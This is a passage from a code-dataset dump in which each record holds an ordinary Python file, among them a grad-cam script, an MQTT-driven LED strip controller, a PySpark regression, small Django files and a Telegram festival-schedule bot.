'*(maxlen-len(chars))\n\ndigits=3\ninput_digits=digits*2+1\noutput_digits=digits+1\n\nadded=set()\nquestions=[]\nanswers=[]\n\nN=20000\nN_train=16000\nN_validation=3200\n\nwhile len(questions)=pi] += -2*pi\n\t\tu = u/abs(u)\n\n\t\tix = argsort(a)\n\n\t\tdir_f0 = 12*log2(dir_f0[ix]/ref_f0[ix])\n\t\tdir_ser = 12*log2(dir_ser[ix]/ref_ser[ix])\n\t\tthr_f0 = thr_f0[ix]\n\t\tthr_ser = thr_ser[ix]\n\t\tse = se_thr[ix]\n\t\tthr = thr[ix]\n\t\tu = u[ix]\n\t\n\t\tfor j in range(len(dir_f0)):\n\t\t\tax.plot(thr_f0[j]+se[j]*array([-1, 1])*real(u[j]), thr_ser[j]+se[j]*array([-1, 1])*imag(u[j]), '-o', color=col, ms=4, mfc='none', mec=col*.7)\n\n\t\ts = ((dir_f0==0) & (dir_ser>0)) | ((dir_f0<0) & (dir_ser==0))\n\t\tax.plot(thr_f0[s], thr_ser[s], '-', color=col*.5+.5, lw=lw, dashes=(2,2))\n\n\t\ts = ((dir_f0==0) & (dir_ser<0)) | ((dir_f0>0) & (dir_ser==0))\n\t\tax.plot(thr_f0[s], thr_ser[s], '-', color=col*.5+.5, lw=lw, dashes=(2,2))\n\n\t\ts = (dir_f0>=0) & (dir_ser>=0)\n\t\tax.plot(thr_f0[s], thr_ser[s], '-', color=col, lw=lw, mec=col*.5, ms=7, marker=markers[brand])\n\n\t\ts = (dir_f0<=0) & (dir_ser<=0)\n\t\tax.plot(thr_f0[s], thr_ser[s], '-', color=col, lw=lw, mec=col*.5, ms=7, label=id, marker=markers[brand])\n \n\nax.legend(loc='lower left', prop={'size': 11})\nax.set_ylabel(\"1/VTL (semitones re. reference)\")\nax.set_xlabel(\"F0 (semitones re. reference)\")\n\nax.set_yticks(range(-14, 10, 2))\n\nxlim = ax.get_xlim()\nylim = ax.get_ylim()\ndx = xlim[1]-xlim[0]\ndy = ylim[1]-ylim[0]\ns = .4\nfig.set_size_inches(dx*s, dy*s)\nfig.savefig(\"Results_indiv.png\", dpi=200, format=\"png\")\nfig.savefig(\"Results_indiv.eps\", format=\"eps\")\n\n\n","sub_path":"Fishy_Adaptive VTL-F0 jnd/plot_results_indiv.py","file_name":"plot_results_indiv.py","file_ext":"py","file_size_in_byte":2996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"605600370","text":"import urllib.request as req\nimport bs4\n\nurl = 'https://netreg.isu.edu.tw/Wapp/Wap_indexmain2.asp'\n\n# 建立 Request 物件,附加 headers 資訊\nrequest = req.Request(url, headers={\n \"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36\"\n})\n\nwith req.urlopen(request) as response:\n data = response.read().decode(\"utf-8\")\n\n#print(data)\n\nroot = bs4.BeautifulSoup(data, \"html.parser\")\n\nn = root.find_all(\"span\", style=\"font-size:20px;\")\n\nfor m in n:\n if m.a == None:\n print(m.string)","sub_path":"crawler-isuwork.py","file_name":"crawler-isuwork.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"116864249","text":"from django.contrib.gis.db import models\nfrom gwml2.models.general import Quantity\nfrom gwml2.models.term_measurement_parameter import TermMeasurementParameter\nfrom gwml2.models.metadata.creation import CreationMetadata\n\n\nclass Measurement(CreationMetadata):\n \"\"\" Model to hold measurement data\n \"\"\"\n\n time = models.DateTimeField(\n null=True, blank=True\n )\n parameter = models.ForeignKey(\n TermMeasurementParameter, null=True, blank=True, verbose_name='parameter',\n on_delete=models.SET_NULL\n )\n methodology = models.CharField(\n null=True, blank=True, max_length=200,\n help_text=\"Explain the methodology used to collect the data, in the field and eventually in the lab.\"\n )\n value = models.OneToOneField(\n Quantity, on_delete=models.SET_NULL,\n null=True, blank=True\n )\n\n class Meta:\n abstract = True\n","sub_path":"models/measurement.py","file_name":"measurement.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"256757093","text":"#!/usr/bin/env python3\n\nimport os\nimport setuptools\n\ninstall_requires = [\n 'empy',\n 'pexpect',\n 'packaging',\n 'pyyaml',\n 'six', # workaround for missing dependency transitive to docker\n]\n\n\nextras_require = {\n 'tests': ['codecov', 'coverage', 'nose', 'pytest'],\n 'packaging': ['stdeb', 'twine']\n}\n\n# docker API used to be in a package called `docker-py` before the 2.0 release\ndocker_package = 'docker'\ntry:\n import docker\nexcept ImportError:\n # Docker is not yet installed, pick library based on platform\n # Use old name if platform has pre-2.0 version\n if os.path.isfile('/etc/os-release'):\n with open('/etc/os-release') as fin:\n content = fin.read()\n if 'xenial' in content:\n docker_package = 'docker-py'\nelse:\n # Docker is installed, pick library based on what we found\n ver = docker.__version__.split('.')\n if int(ver[0]) < 2:\n docker_package = 'docker-py'\n\ninstall_requires.append(docker_package)\n\nkwargs = {\n 'name': 'groot_rocker',\n 'version': '0.4.1',\n 'packages': ['groot_rocker'],\n 'package_data': {'groot_rocker': ['templates/*.em']},\n 'entry_points': {\n 'console_scripts': [\n 'groot-rocker = groot_rocker.cli:main',\n 'detect_docker_image_os = groot_rocker.cli:detect_image_os'\n ],\n 'groot_rocker.extensions': [\n 'container_name = groot_rocker.extensions:ContainerName',\n 'devices = groot_rocker.extensions:Devices',\n 'env = groot_rocker.extensions:Environment',\n 'home = groot_rocker.extensions:HomeDir',\n 'network = groot_rocker.extensions:Network',\n ]\n },\n 'author': 'Daniel Stonier',\n 'author_email': 'd.stonier@gmail.com',\n 'keywords': ['Docker'],\n 'classifiers': [\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'License :: OSI Approved :: Apache Software License'\n ],\n 'description': 'A tool to run docker containers with customized extras',\n 'long_description': 'A tool to run docker containers with customized extra added like git gui support overlayed.',\n 'license': 'Apache License 2.0',\n 'python_requires': '>=3.0',\n\n 'install_requires': install_requires,\n 'extras_require': extras_require,\n 'url': 'https://github.com/stonier/groot_rocker'\n}\n\nsetuptools.setup(**kwargs)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"303327895","text":"lista = []\nmaior = menor = 0\nfor c in range(0,5):\n num = int(input('Digte um numero: '))\n if c == 0 or num > lista[-1]:\n lista.append(num)\n else:\n pos = 0\n while pos < len(lista):\n if num <= lista[pos]:\n lista.insert(pos, num)\n break\n pos += 1\nprint(f'Os valores digitados em ordem foram {lista}')\n\n","sub_path":"lista ordenada sem repetições.py","file_name":"lista ordenada sem repetições.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"533870184","text":"import sys\nimport os\nimport numpy as np\nsys.path.append(\"code/utils\")\nimport utils\n#command line args as follows:\nprint(\"Command line args: model image\")\n\nmodelArg = sys.argv[1]\nimgArg = sys.argv[2]\n\nfrom keras.preprocessing import image as im\nfrom keras.models import Model,load_model\nfrom keras import activations\nfrom keras.backend import image_data_format,image_dim_ordering\nfrom keras.applications.inception_v3 import InceptionV3\n\n#For testing\nsys.path.append(\"code\")\nimport FTMC_InceptionV3_v3\nimport FTMC_InceptionV3_v4\nimport FTMC_Xception_v3\nimport FTMC_Xception_v4\n\n# oldmodel=load_model(modelArg)\n# # print(oldmodel.summary())\n# # print(image_data_format())\n# # print(image_dim_ordering())\n# # print(oldmodel.inputs)\n# # print(oldmodel.layers[0])\n# # print(type(oldmodel.layers[0]))\n# # layer_idx = -1 \n# #\n# #\n# #model = FTMC_InceptionV3_v3.FTMC_InceptionV3_v3().model\n# model = FTMC_Xception_v3.FTMC_Xception_v3().model\n#\n# assert len(oldmodel.layers) == len(model.layers)\n#\n# for idx,layer in enumerate(oldmodel.layers):\n# assert type(oldmodel.layers[idx]) == type(model.layers[idx])\n# model.layers[idx].set_weights(layer.get_weights())\n# #\n# # print('##############new model#############')\n# # print(model.summary())\n# # print(image_data_format())\n# # print(image_dim_ordering())\n# # print(model.inputs)\n# # print(model.layers[0])\n# # print(type(model.layers[0]))\n# #\n# from keras.optimizers import SGD\n# model.compile(optimizer=SGD(lr=0.0001, momentum=0.9), loss='categorical_crossentropy')\n# model.save(modelArg+\"FIX\")\nmodel=load_model(modelArg)\n\n# input_shape = (299, 299, 3)\n#model = InceptionV3(input_shape=input_shape, weights='imagenet', include_top=True) \n\n\n#TODO:\n## setting input_shape on model initialisation is absolutely required for keras-vis\n## not sure why figuring this out might be intresting for contributing to keras-vis :-)\n## workaround instantiate new identical model as the trained model\n## iterate over the layers of both the trained and new model\n# newmodellayer.set_weights(oldmodellayer.get_weights)\n# do initially with Inceptionv3_v3 \n# use a model-file-naming -> class mapping\n\nfrom vis.utils import utils as vizut\n# Swap softmax with linear\nlayer_idx=-1\nmodel.layers[layer_idx].activation = activations.linear\nmodel = vizut.apply_modifications(model)\n\nfrom matplotlib import pyplot as plt\nfrom skimage import io, transform\n#%matplotlib inline\nplt.rcParams['figure.figsize'] = (18, 6)\n\n#img1 = vizut.load_img('ouzel.jpg', target_size=(299, 299))\n#img2 = vizut.load_img(\"tench2.jpg\", target_size=(299, 299))\n#img1 = vizut.load_img('B2split_0_Val/1_Spanklem/IMG_20170904_142748285.jpg', target_size=(299, 299))\nimg1 = vizut.load_img('B2split_2_Val/3_VleugelMoerOpleg_Rond/P1090190.JPG', target_size=(299, 299))\nimg2 = vizut.load_img(\"B2split_2_Val/4.0_Variable_Spanklem_Kort/P1090420.JPG\", target_size=(299, 299))\n#img2 = vizut.load_img(\"B2split_0_Val/1_Spanklem/IMG_20170904_154745119.jpg\", target_size=(299, 299))\n#img2 = vizut.load_img('ouzel.jpg', target_size=(299, 299))\n\n# print(vizut.get_img_shape(img1))\n# f, ax = plt.subplots(2, 2)\n# ax[0][0].imshow(img1)\n# ax[0][1].imshow(img1)\n# ax[1][0].imshow(img2)\n# ax[1][1].imshow(img2)\n# plt.show()\n\n\n\nfrom vis.visualization import visualize_saliency, overlay\nfrom vis.utils import utils\nfrom keras import activations\n\n# Utility to search for layer index by name. \n# Alternatively we can specify this as -1 since it corresponds to the last layer.\n#final_layer_idx = utils.find_final_layer_idx(model, 'predictions')\nfinal_layer_idx = -1 \n\nfilter_index=3\n\nf, ax = plt.subplots(2, 2)\nfor i, img in enumerate([img1, img2]): \n # 20 is the imagenet index corresponding to `ouzel`\n grads = visualize_saliency(model, final_layer_idx, filter_indices=filter_index, seed_input=img)\n\n # visualize grads as heatmap\n ax[i][0].imshow(img)\n ax[i][1].imshow(grads, cmap='jet')\nplt.show()\n\nfor modifier in ['guided', 'relu']:\n f, ax = plt.subplots(2, 2)\n for i, img in enumerate([img1, img2]): \n plt.suptitle(modifier)\n # 0 i assume shoudl be the filter index for spanklem1.0\n grads = visualize_saliency(model, final_layer_idx, filter_indices=filter_index, seed_input=img, backprop_modifier=modifier)\n ax[i][0].imshow(img)\n ax[i][1].imshow(grads, cmap='jet')\n plt.show()\n\nimport numpy as np\nimport matplotlib.cm as cm\nfrom vis.visualization import visualize_cam\nfrom vis.visualization import overlay\nlayer_idx = -1 \n\n#plt.figure()\nfor modifier in [None, 'guided', 'relu']:\n f, ax = plt.subplots(2, 2)\n plt.suptitle(\"vanilla\" if modifier is None else modifier)\n for i, img in enumerate([img1, img2]): \n grads = visualize_cam(model, layer_idx, filter_indices=filter_index, seed_input=img, backprop_modifier=modifier) \n print(grads)\n print(grads.shape)\n # Lets overlay the heatmap onto original image. \n #jet_heatmap = np.uint8(cm.jet(grads) * 255)[:, : , :, 0]\n cmjet=cm.jet(grads)\n print(cmjet)\n print(cmjet.shape)\n print(\"HELI\")\n cmheli=cm.cubehelix(grads)\n print(cmheli)\n print(cmheli.shape)\n # print(cmjet[0][0][0])\n # print(cmjet[0][0][1])\n print(\"[..., :3]\")\n print(cmjet[..., :3])\n print(cmjet[..., :3].shape)\n print(\"[:,:,:,:3]\")\n print(cmjet[:,:,:,:3])\n print(cmjet[:,:,:,:3].shape)\n jet_heatmap = np.uint8(cm.jet(grads)[..., :3] * 255)\n print(jet_heatmap)\n print(jet_heatmap.shape)\n print(img.shape)\n ax[i][0].imshow(img)\n ax[i][1].imshow(grads, cmap='jet')\n #ax[i].imshow(overlay(jet_heatmap, img))\n #ax[i][1].imshow(overlay(jet_heatmap, img))\n plt.show()\n","sub_path":"grad-cam.py","file_name":"grad-cam.py","file_ext":"py","file_size_in_byte":5737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"434276573","text":"from django.conf.urls import url\nimport views\n\nurlpatterns = [\n url(r'^export/profile', views.export_profile,\n name=\"profiles_export_profile\"),\n url(r'^export/user', views.export_user,\n name=\"profiles_export_user\"),\n url(r'^export/contact', views.export_contact,\n name=\"profiles_export_contact\"),\n]\n","sub_path":"sample/profiles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"278670200","text":"#!/usr/bin/env python3\n\n# LED imports\nimport time\nfrom rpi_ws281x import *\nimport argparse\n\n#MQTT imports\nimport paho.mqtt.client as mqtt\n\n# LED strip configuration:\nLED_COUNT = 300 # Number of LED pixels.\nLED_PIN = 18 # GPIO pin connected to the pixels (18 uses PWM!).\n#LED_PIN = 10 # GPIO pin connected to the pixels (10 uses SPI /dev/spidev0.0).\nLED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)\nLED_DMA = 10 # DMA channel to use for generating signal (try 10)\nLED_BRIGHTNESS = 255 # Set to 0 for darkest and 255 for brightest\nLED_INVERT = False # True to invert the signal (when using NPN transistor level shift)\nLED_CHANNEL = 0 # set to '1' for GPIOs 13, 19, 41, 45 or 53\n\n# --------------------------------------------LED Functions---------------------------------------------------------------------\n\ndef colorWipe(strip, color, wait_ms=50):\n \"\"\"Wipe color across display a pixel at a time.\"\"\"\n for i in range(strip.numPixels()):\n strip.setPixelColor(i, color)\n strip.show()\n time.sleep(wait_ms/1000.0)\n\n\n# def blend(strip, firstColor, secondColor, wait_ms=50):\n# \"\"\"Blends color from one firstColor to secondColor\"\"\"\n# colorOne = firstColor\n# colorTwo = secondColor\n# blend = list(colorOne.range_to(colorTwo), LED_COUNT)\n# i = 0\n# for color in blend:\n# strip.setPixelColor(i, color)\n# strip.show()\n# i += 1\n# time.sleep(wait_ms/1000)\n\ndef fire(strip, wait_ms=50):\n for i in range(strip.numPixels()):\n strip.setPixelColor(i, Color(255, i % 256, 0))\n strip.show()\n time.sleep(wait_ms/1000.0)\n\n\ndef theaterChase(strip, color, wait_ms=50, iterations=10):\n \"\"\"Movie theater light style chaser animation.\"\"\"\n for j in range(iterations):\n for q in range(3):\n for i in range(0, strip.numPixels(), 3):\n strip.setPixelColor(i+q, color)\n strip.show()\n time.sleep(wait_ms/1000.0)\n for i in range(0, strip.numPixels(), 3):\n strip.setPixelColor(i+q, 0)\n\ndef wheel(pos):\n \"\"\"Generate rainbow colors across 0-255 positions.\"\"\"\n if pos < 85:\n return Color(pos * 3, 255 - pos * 3, 0)\n elif pos < 170:\n pos -= 85\n return Color(255 - pos * 3, 0, pos * 3)\n else:\n pos -= 170\n return Color(0, pos * 3, 255 - pos * 3)\n\ndef rainbow(strip, wait_ms=20, iterations=1):\n \"\"\"Draw rainbow that fades across all pixels at once.\"\"\"\n for j in range(256*iterations):\n for i in range(strip.numPixels()):\n strip.setPixelColor(i, wheel((i+j) & 255))\n strip.show()\n time.sleep(wait_ms/1000.0)\n\ndef rainbowCycle(strip, wait_ms=20, iterations=5):\n \"\"\"Draw rainbow that uniformly distributes itself across all pixels.\"\"\"\n for j in range(256*iterations):\n for i in range(strip.numPixels()):\n strip.setPixelColor(i, wheel((int(i * 256 / strip.numPixels()) + j) & 255))\n strip.show()\n time.sleep(wait_ms/1000.0)\n\ndef theaterChaseRainbow(strip, wait_ms=50):\n \"\"\"Rainbow movie theater light style chaser animation.\"\"\"\n for j in range(256):\n for q in range(3):\n for i in range(0, strip.numPixels(), 3):\n strip.setPixelColor(i+q, wheel((i+j) % 255))\n strip.show()\n time.sleep(wait_ms/1000.0)\n for i in range(0, strip.numPixels(), 3):\n strip.setPixelColor(i+q, 0)\n\n\n# --------------------------------------------Subscriber Functions---------------------------------------------------------------------\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with rc: \" + str(rc))\n client.subscribe(\"codomo/led\")\n\ndef on_message(client, userdata, message):\n load = str(message.payload)\n if \"red\" in load:\n print(\"Red message received. Turning LED to red\")\n colorWipe(strip, Color(255, 0, 0))\n return\n\n if \"green\" in load:\n print(\"Green message received. Turning LED to Green\")\n colorWipe(strip, Color(0, 255, 0))\n return\n \n if \"blue\" in load:\n print(\"Blue message received. Turning LED to Blue\")\n colorWipe(strip, Color(0, 0, 255))\n return\n \n if \"theaterChase\" in load:\n print(\"TheaterChase message received. Turning LED to theater chase\")\n theaterChase(strip, Color(127, 127, 127)) # White theater chase\n theaterChase(strip, Color(127, 0, 0)) # Red theater chase\n theaterChase(strip, Color( 0, 0, 127)) # Blue theater chase\n return\n\n if \"rainbow\" in load:\n print(\"Rainbow message received. Turning LED to Rainbow\")\n rainbow(strip)\n return\n\n if \"theatherChaseRainbow\" in load:\n print(\"Theatre Chase Rainbow mode activated\")\n theaterChaseRainbow(strip)\n return\n\n if \"fire\" in load:\n print(\"Let the flames of ragnarok descend upon us!\")\n fire(strip)\n\n#----------------------------------------------LED Setup------------------------------------------------------------------------\nstrip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL)\nstrip.begin()\n\n#----------------------------------------------MQTT Setup------------------------------------------------------------------------\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\n\nclient.connect(\"192.168.0.119\", 1883, 60)\ncolorWipe(strip, Color(255, 255, 255))\n\nclient.loop_forever()\n","sub_path":"python/examples/subscribe.py","file_name":"subscribe.py","file_ext":"py","file_size_in_byte":5581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"629096903","text":"from pyspark.conf import SparkConf\nfrom pyspark.context import SparkContext\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import *\n\nfrom pyspark.mllib.regression import LabeledPoint\nfrom pyspark.mllib.tree import DecisionTree\nfrom pyspark.mllib.evaluation import RegressionMetrics\nimport pandas as pd\n\ndef pd_read():\n df_hour = pd.read_csv('/usr/local/Cellar/apache-spark/3.0.0/libexec/sources/hour.csv')\n print(df_hour.loc[0:4])\n return df_hour.keys()\n\ndef data_propossessing(sc):\n day_data = sc.textFile('/usr/local/Cellar/apache-spark/3.0.0/libexec/sources/day.csv')\n hour_data = sc.textFile('/usr/local/Cellar/apache-spark/3.0.0/libexec/sources/hour.csv')\n R_hour_RDD = hour_data.map(lambda x:x.split(','))\n header = R_hour_RDD.first()\n R_hour_RDD_cor = R_hour_RDD.filter(lambda line:line != header)\n print(R_hour_RDD_cor.take(3))\n exist_ls = [num for num in range(17)]\n for item in [0,1,3,14,15]:\n exist_ls.remove(item)\n data_stage1 = R_hour_RDD_cor.map(lambda tp:[tp[item] for item in exist_ls])\n print('informaiton data remains:',data_stage1.take(3))\n data_stage2 = data_stage1.map(lambda tp:LabeledPoint(\n label=float(tp[-1]),\n features=[float(item) for item in tp[0:len(tp)-1]]\n ))\n print('labeled data:',data_stage2.take(3))\n return data_stage2\n\ndef data_spliting(rdd):\n trainData,testData = rdd.randomSplit([8,2])\n print(trainData.count(),testData.count())\n return trainData,testData\n\ndef model_and_prediction(trainData,testData):\n maxDepthlist = [3,5,10,15,20,25]\n maxBinslist = [3,5,10,50,100,200]\n model_selection_dict = {}\n for num_i in range(0,6,1):\n for num_j in range(0,6,1):\n model_choice = DecisionTree.trainRegressor(data=trainData,\n categoricalFeaturesInfo={},\n impurity='variance',\n maxDepth=maxDepthlist[num_i],\n maxBins=maxBinslist[num_j])\n test_features = testData.map(lambda tp:tp.features)\n pred_result = model_choice.predict(test_features)\n flatten = pred_result.zip(testData.map(lambda tp:tp.label))\n metrics = RegressionMetrics(flatten)\n RMSE = metrics.rootMeanSquaredError\n print(f'model based on maxDepth={maxDepthlist[num_i]} and maxBins={maxBinslist[num_j]}:',RMSE)\n model_selection_dict[(num_i,num_j)] = RMSE\n best_result = 200\n for pair in model_selection_dict.items():\n if pair[1] < best_result:\n best_result = pair[1]\n _num_i = list(model_selection_dict.keys())[list(model_selection_dict.values()).index(best_result)][0]\n _num_j = list(model_selection_dict.keys())[list(model_selection_dict.values()).index(best_result)][1]\n best_model_string = 'The best model parameters come as:' \\\n + f'maxDepth={maxDepthlist[_num_i]}, maxBins={maxBinslist[_num_j]} -- ' \\\n + f'MSE={best_result}'\n return best_model_string\n\nif __name__ == '__main__':\n # spark = SparkSession \\\n # .builder \\\n # .appName('spark_regression') \\\n # .getOrCreate()\n # sc = spark.sparkContext\n conf = SparkConf().setAppName('spark_regression')\n sc1 = SparkContext(conf=conf)\n # print(pd_read())\n data_labeled = data_propossessing(sc=sc1)\n trainData, testData = data_spliting(data_labeled)\n best_model_string = model_and_prediction(trainData=trainData,testData=testData)\n print(best_model_string)","sub_path":"spark_MLlib/spark_regression.py","file_name":"spark_regression.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"321807048","text":"import sys\n\nsys.stdin = open('input.txt', 'r')\n\nN, M = map(int, input().split())\n\nnumbers = [num for num in range(1, N + 1)]\n\nall_seq = []\nfor i in range(N):\n q = [[numbers[i]]]\n\n while q:\n seq = q.pop(0)\n\n if len(seq) == M:\n all_seq.append(seq)\n else:\n for num in numbers:\n if num > seq[-1] and num not in seq:\n new_seq = seq + [num]\n q.append(new_seq)\n\nfor seq in all_seq:\n print(\"{}\".format(' '.join(map(str, seq))))\n","sub_path":"PYTHON/BAEKJOON/15650_N과_M_2/15650.py","file_name":"15650.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"269029406","text":"\nimport logging\nimport datetime\nimport time\nimport os\nimport csv\nimport glob\n\nfrom texts import *\n\nos.environ['TZ'] = 'Europe/Moscow'\ntime.tzset()\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n\n\ndef format_date(datetime):\n return datetime.strftime(\"%Y.%m.%d\")\n\n\ndef format_datetime(datetime):\n return datetime.strftime(\"%Y.%m.%d %H:%M\")\n\n\ndef parse_time(time_string):\n return datetime.datetime.strptime(time_string, \"%H:%M\").time()\n\n\ndef parse_datetime(datetime_string):\n return datetime.datetime.strptime(datetime_string, \"%Y.%m.%d %H:%M\")\n\n\ndef scene_name(file_name):\n return file_name.split(\"-\")[2][:-4].strip()\n\n\ndef format_artist(time, artist):\n return time.strftime(\"%H:%M - \" + artist)\n\n\ndef test_suite():\n report = \"\"\n\n time = datetime.datetime(2018, 5, 25, 18, 00)\n expected = no_event_text\n report += test_case(time, expected)\n\n time = datetime.datetime(2018, 5, 26, 11, 00)\n expected = starting_soon_text + \"\"\"\n\nbeta stage:\n16:00 - Galich\n\ngamma stage:\n22:00 - Eye Que b2b naya\n\nomega stage:\n22:00 - Lluck\n\"\"\"\n\n report += test_case(time, expected)\n\n time = datetime.datetime(2018, 5, 26, 15, 00)\n # same expected value\n report += test_case(time, expected)\n\n time = datetime.datetime(2018, 5, 26, 16, 00)\n expected = playing_now_text + \"\"\"\n\nbeta stage:\n16:00 - Galich\n17:30 - ArkadyAir\n\ngamma stage:\n22:00 - Eye Que b2b naya\n\nomega stage:\n22:00 - Lluck\n\"\"\"\n\n report += test_case(time, expected)\n\n time = datetime.datetime(2018, 5, 26, 16, 5)\n # same expected value\n report += test_case(time, expected)\n\n time = datetime.datetime(2018, 5, 27, 8, 40)\n expected = playing_now_text + \"\"\"\n\nbeta stage:\n08:30 - Anrilov b2b Bvoice\n12:00 - окончание\n\ngamma stage:\n07:00 - Kobba\n09:00 - окончание\n\nomega stage:\n07:30 - Lena Popova\n09:00 - Cultkitchen\n\"\"\"\n\n report += test_case(time, expected)\n\n time = datetime.datetime(2018, 5, 27, 9, 10)\n expected = playing_now_text + \"\"\"\n\nbeta stage:\n08:30 - Anrilov b2b Bvoice\n12:00 - окончание\n\nomega stage:\n09:00 - Cultkitchen\n12:00 - окончание\n\"\"\"\n report += test_case(time, expected)\n\n time = datetime.datetime(2018, 5, 27, 12, 00)\n # same expected value\n report += test_case(time, expected)\n\n time = datetime.datetime(2018, 5, 27, 12, 20)\n expected = over_text + \"\\n\"\n report += test_case(time, expected)\n\n time = datetime.datetime(2018, 5, 27, 19, 20)\n # same expected value\n report += test_case(time, expected)\n\n return report\n\n\ndef test_case(time, expected):\n report = time.strftime(\"\\n\\n%Y.%m.%d %H:%M:\\n\")\n actual = playing_at(time)\n if actual == expected:\n report += \"Test passed\\n\\n\" + actual\n else:\n report += \"Test failed\\n\\nActaul result:\\n\" + actual + \"\\nExpected result:\\n\" + expected\n print(actual)\n print(expected)\n import difflib\n expected = expected.splitlines(1)\n actual = actual.splitlines(1)\n diff = difflib.unified_diff(expected, actual)\n print(''.join(diff))\n\n return report\n\n\ndef test(bot, update, args):\n chat_id = update.message.chat.id\n if len(args) == 0:\n bot.sendMessage(text=test_suite(), chat_id=chat_id)\n else:\n time = ' '.join(args)\n report = \"Playing at \" + time + \"\\n\"\n report += playing_at(parse_datetime(time))\n bot.sendMessage(text=report, chat_id=chat_id)\n\n\ndef playing_at(time):\n today_string = format_date(time)\n today_files = glob.glob(\"data/*\" + today_string + \"*.csv\")\n\n yesterday = time - datetime.timedelta(days=1)\n tomorrow = time + datetime.timedelta(days=1)\n\n today_date = time.date()\n yesterday_date = yesterday.date()\n tomorrow_date = tomorrow.date()\n\n yesterday_string = format_date(yesterday)\n yesterday_files = glob.glob(\"data/*\" + yesterday_string + \"*.csv\")\n\n if len(today_files) == len(yesterday_files) == 0:\n return no_event_text\n\n schedule = {}\n\n for file in yesterday_files:\n scene = scene_name(file)\n if not scene in schedule:\n schedule[scene] = []\n\n reached_today = False\n\n with open(file, newline='') as csvfile:\n previous_time = datetime.time(0, 0)\n scene_reader = csv.reader(csvfile)\n for row in scene_reader:\n # print(row)\n event_time = parse_time(row[0])\n event_name = row[1]\n\n if event_time < previous_time:\n reached_today = True\n\n current_date = today_date if reached_today else yesterday_date\n event_datetime = datetime.datetime.combine(current_date, event_time)\n schedule[scene].append((event_datetime, event_name))\n\n previous_time = event_time\n\n for file in today_files:\n scene = scene_name(file)\n if not scene in schedule:\n schedule[scene] = []\n\n reached_tomorrow = False\n\n with open(file, newline='') as csvfile:\n previous_time = datetime.time(0, 0)\n scene_reader = csv.reader(csvfile)\n for row in scene_reader:\n # print(row)\n event_time = parse_time(row[0])\n event_name = row[1]\n\n if event_time < previous_time:\n reached_tomorrow = True\n\n current_date = tomorrow_date if reached_tomorrow else today_date\n event_datetime = datetime.datetime.combine(current_date, event_time)\n schedule[scene].append((event_datetime, event_name))\n\n previous_time = event_time\n\n # print(schedule)\n\n\n DAY_THRESHOLD = datetime.time(14, 0)\n\n # TODO: find out dynamically\n STAGES_ORDER = [\"MAIN\", \"SANCTUM\"]\n\n started = False\n for scene in schedule:\n if time >= schedule[scene][0][0]:\n started = True\n break\n\n if not started:\n result = starting_soon_text\n for stage in STAGES_ORDER:\n if stage in schedule:\n first_entry = schedule[stage][0]\n result += \"\\n\\n\" + stage + \":\\n\"\n result += format_artist(first_entry[0], first_entry[1])\n\n result += \"\\n\"\n return result\n\n\n else:\n result = playing_now_text\n for stage in STAGES_ORDER:\n if stage in schedule:\n first_entry = schedule[stage][0]\n if first_entry[0] > time:\n result += \"\\n\\n\" + stage + \":\\n\"\n result += format_artist(first_entry[0], first_entry[1])\n else:\n current_entry = first_entry\n for next_entry in schedule[stage][1:]:\n if next_entry[0] >= time:\n result += \"\\n\\n\" + stage + \":\\n\"\n result += format_artist(current_entry[0], current_entry[1]) + \"\\n\"\n result += format_artist(next_entry[0], next_entry[1])\n\n break\n\n current_entry = next_entry\n\n result += \"\\n\"\n\n if result == playing_now_text + \"\\n\": # all the stages have finished\n result = over_text + \"\\n\"\n\n return result\n\n\ndef playing_now():\n return playing_at(datetime.datetime.now())\n\n\ndef start(bot, update):\n chat_id = update.message.chat.id\n\n buttons_list = make_buttons_list()\n menu = build_menu(buttons_list, 1)\n markup = InlineKeyboardMarkup(menu)\n bot.sendMessage(text=playing_now(), chat_id=chat_id, reply_markup=markup)\n\n\ndef build_menu(buttons, n_cols):\n menu = [buttons[i:i + n_cols] for i in range(0, len(buttons), n_cols)]\n return menu\n\n\ndef make_buttons_list():\n buttons_list = [InlineKeyboardButton(\"Обновить\", callback_data='update')]\n\n return buttons_list\n\n\ndef button(bot, update):\n query = update.callback_query\n data = query.data\n chat_id = query.message.chat.id\n\n if data == 'update':\n buttons_list = make_buttons_list()\n menu = build_menu(buttons_list, 1)\n markup = InlineKeyboardMarkup(menu)\n bot.sendMessage(text=playing_now(), chat_id=query.message.chat.id, reply_markup=markup)\n\n\ndef handle_message(bot, update):\n chat_id = update.message.chat.id\n\n buttons_list = make_buttons_list()\n menu = build_menu(buttons_list, 1)\n 